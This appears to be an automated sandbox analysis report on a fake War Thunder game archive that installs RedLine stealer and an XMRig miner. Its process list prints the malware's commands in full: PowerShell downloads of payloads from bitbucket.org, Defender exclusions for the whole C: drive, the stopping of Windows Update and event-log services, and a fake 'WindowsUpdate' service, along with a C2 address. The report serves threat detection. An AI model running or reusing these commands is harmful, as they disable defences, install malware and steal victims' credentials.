Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
62s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
26/07/2024, 15:22
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com//twitty1xnem/w-warthunderw/releases/download/cfhvs7k7qp/un.rar
Resource
win10v2004-20240709-en
General
-
Target
https://github.com//twitty1xnem/w-warthunderw/releases/download/cfhvs7k7qp/un.rar
Malware Config
Extracted
redline
185.196.9.26:6302
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/3604-265-0x0000000000410000-0x0000000000460000-memory.dmp family_redline -
XMRig Miner payload 7 IoCs
resource yara_rule behavioral1/memory/1864-249-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1864-250-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1864-254-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1864-255-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1864-252-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1864-256-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1864-253-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
flow pid Process 57 5080 powershell.exe 59 5080 powershell.exe 62 5436 powershell.exe 64 5436 powershell.exe -
pid Process 5296 powershell.exe 5884 powershell.exe 5012 powershell.exe 1420 powershell.exe 5868 powershell.exe 5080 powershell.exe 5436 powershell.exe 4012 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
pid Process 6080 BlackLauncher.exe 5540 BlackLauncher.exe 4288 v10L3M7.exe -
resource yara_rule behavioral1/memory/1864-244-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-246-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-245-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-249-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-250-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-254-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-255-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-252-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-256-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-253-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-248-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1864-243-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 84 bitbucket.org 56 bitbucket.org 57 bitbucket.org 62 bitbucket.org 75 pastebin.com 76 pastebin.com -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2684 sc.exe 2024 sc.exe 5828 sc.exe 6068 sc.exe 5436 sc.exe 632 sc.exe 4348 sc.exe 5284 sc.exe 4060 sc.exe 1460 sc.exe 3876 sc.exe 4932 sc.exe 5020 sc.exe 5772 sc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000_Classes\Local Settings msedge.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 4620 msedge.exe 4620 msedge.exe 1452 msedge.exe 1452 msedge.exe 3504 identity_helper.exe 3504 identity_helper.exe 5208 msedge.exe 5208 msedge.exe 5296 powershell.exe 5296 powershell.exe 5296 powershell.exe 5884 powershell.exe 5884 powershell.exe 5884 powershell.exe 5080 powershell.exe 5080 powershell.exe 5080 powershell.exe 5436 powershell.exe 5436 powershell.exe 5436 powershell.exe 4288 v10L3M7.exe 5012 powershell.exe 5012 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
description pid Process Token: SeRestorePrivilege 5760 7zFM.exe Token: 35 5760 7zFM.exe Token: SeRestorePrivilege 5900 7zG.exe Token: 35 5900 7zG.exe Token: SeSecurityPrivilege 5900 7zG.exe Token: SeSecurityPrivilege 5900 7zG.exe Token: SeRestorePrivilege 6012 7zG.exe Token: 35 6012 7zG.exe Token: SeSecurityPrivilege 6012 7zG.exe Token: SeSecurityPrivilege 6012 7zG.exe Token: 33 2784 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2784 AUDIODG.EXE Token: SeDebugPrivilege 5296 powershell.exe Token: SeDebugPrivilege 5884 powershell.exe Token: SeDebugPrivilege 5080 powershell.exe Token: SeDebugPrivilege 5436 powershell.exe Token: SeDebugPrivilege 5012 powershell.exe -
Suspicious use of FindShellTrayWindow 46 IoCs
pid Process 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 5760 7zFM.exe 5900 7zG.exe 6012 7zG.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe 1452 msedge.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 6080 BlackLauncher.exe 6080 BlackLauncher.exe 6080 BlackLauncher.exe 5540 BlackLauncher.exe 5540 BlackLauncher.exe 5540 BlackLauncher.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1452 wrote to memory of 4580 1452 msedge.exe 84 PID 1452 wrote to memory of 4580 1452 msedge.exe 84 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 1524 1452 msedge.exe 85 PID 1452 wrote to memory of 4620 1452 msedge.exe 86 PID 1452 wrote to memory of 4620 1452 msedge.exe 86 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87 PID 1452 wrote to memory of 468 1452 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com//twitty1xnem/w-warthunderw/releases/download/cfhvs7k7qp/un.rar1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1452 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9e75a46f8,0x7ff9e75a4708,0x7ff9e75a47182⤵PID:4580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2020 /prefetch:22⤵PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:82⤵PID:468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:3160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:12⤵PID:3788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:82⤵PID:2488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2592 /prefetch:12⤵PID:1376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:12⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3436 /prefetch:82⤵PID:4364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:12⤵PID:1232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:12⤵PID:4844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:12⤵PID:2436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2004,2522849656964467684,17103708727602919554,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5208
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3184
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2684
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5476
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\un.rar"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5760
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap14859:66:7zEvent117321⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5900
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\un\" -spe -an -ai#7zMap8062:66:7zEvent20961⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6012
-
C:\Users\Admin\Downloads\un\BlackLauncher.exe"C:\Users\Admin\Downloads\un\BlackLauncher.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6080 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command " Start-Process -FilePath 'C:/Users/Admin/Downloads/un/BlackLauncher.exe' -ArgumentList '--rendering-driver opengl3 --admin-requested' -Verb RunAs "2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5296 -
C:\Users\Admin\Downloads\un\BlackLauncher.exe"C:\Users\Admin\Downloads\un\BlackLauncher.exe" --rendering-driver opengl3 --admin-requested3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5884
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/v10L3M7.exe'""4⤵PID:6024
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/v10L3M7.exe'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5080
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/YpVbdgn.exe'""4⤵PID:756
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/YpVbdgn.exe'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5436
-
-
-
C:\ProgramData\Update\v10L3M7.exeC:\ProgramData\Update\v10L3M7.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4288 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵PID:1780
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵PID:5832
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
PID:632
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:5828
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
PID:4060
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
PID:5772
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
PID:4348
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WindowsUpdate"5⤵
- Launches sc.exe
PID:2024
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"5⤵
- Launches sc.exe
PID:6068
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:1460
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WindowsUpdate"5⤵
- Launches sc.exe
PID:2684
-
-
-
C:\ProgramData\Update\YpVbdgn.exeC:\ProgramData\Update\YpVbdgn.exe4⤵PID:4812
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵PID:3604
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "4⤵
- Command and Scripting Interpreter: PowerShell
PID:5868
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/LVST3SS.exe'""4⤵PID:3636
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/LVST3SS.exe'"5⤵
- Command and Scripting Interpreter: PowerShell
PID:4012
-
-
-
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x300 0x4f41⤵
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
C:\ProgramData\Windows11\Updater.exeC:\ProgramData\Windows11\Updater.exe1⤵PID:3956
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:1420
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:5716
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:5296
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:3876
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:5284
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:5436
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:4932
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:5020
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:5264
-
-
C:\Windows\system32\svchost.exesvchost.exe2⤵PID:1864
-
-
C:\Windows\system32\notepad.exe"C:\Windows\system32\notepad.exe"1⤵PID:4352
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
575KB
MD5ad2867dc002af2cca594f0b8202a1843
SHA173b3ea99db621b71e7a4a13720c53ebe3a815521
SHA2562c0e4b4e5535c97fbf45309cbe7ff05006f06db1f3bf31983c7b0e7a7753900d
SHA512cfb6c5f1333187e0e807a3b2beb72cb50805fac403b900242afce017ccde5a677d7b8c6be86fb9933db64103cb78b17c57fdec4c764f14c89793a5ec3e309108
-
Filesize
2.6MB
MD561d3abff46a6bd2946925542c7d30397
SHA11fed80a136e67a5b7b6846010a5853400886ee9c
SHA256b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa
SHA512e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
152B
MD575c9f57baeefeecd6c184627de951c1e
SHA152e0468e13cbfc9f15fc62cc27ce14367a996cff
SHA256648ba270261690bb792f95d017e134d81a612ef4fc76dc41921c9e5b8f46d98f
SHA512c4570cc4bb4894de3ecc8eee6cd8bfa5809ea401ceef683557fb170175ff4294cc21cdc6834db4e79e5e82d3bf16105894fff83290d26343423324bc486d4a15
-
Filesize
152B
MD510fa19df148444a77ceec60cabd2ce21
SHA1685b599c497668166ede4945d8885d204fd8d70f
SHA256c3b5deb970d0f06a05c8111da90330ffe25da195aafa4e182211669484d1964b
SHA5123518ce16fef66c59e0bdb772db51aeaa9042c44ca399be61ca3d9979351f93655393236711cf2b1988d5f90a5b9318a7569a8cef3374fc745a8f9aa8323691ef
-
Filesize
20KB
MD5edd9578bc1e45c27ab91a0d183f95c15
SHA1cb324af25534cb4f9778f21296976130497c9185
SHA256b926ee2e2880f2431ba777c9581b7055a592c9409acb9fa607d73adbb0d4bccd
SHA5127bf0077f988d370c2fd3755ab5863c611347c4e05b7c829e8e7ffceb4bfa2c5d379176480431cb1d38626965a53b26a5b4713b01cdc7fc8b32305fca7c09017d
-
Filesize
265B
MD5f5cd008cf465804d0e6f39a8d81f9a2d
SHA16b2907356472ed4a719e5675cc08969f30adc855
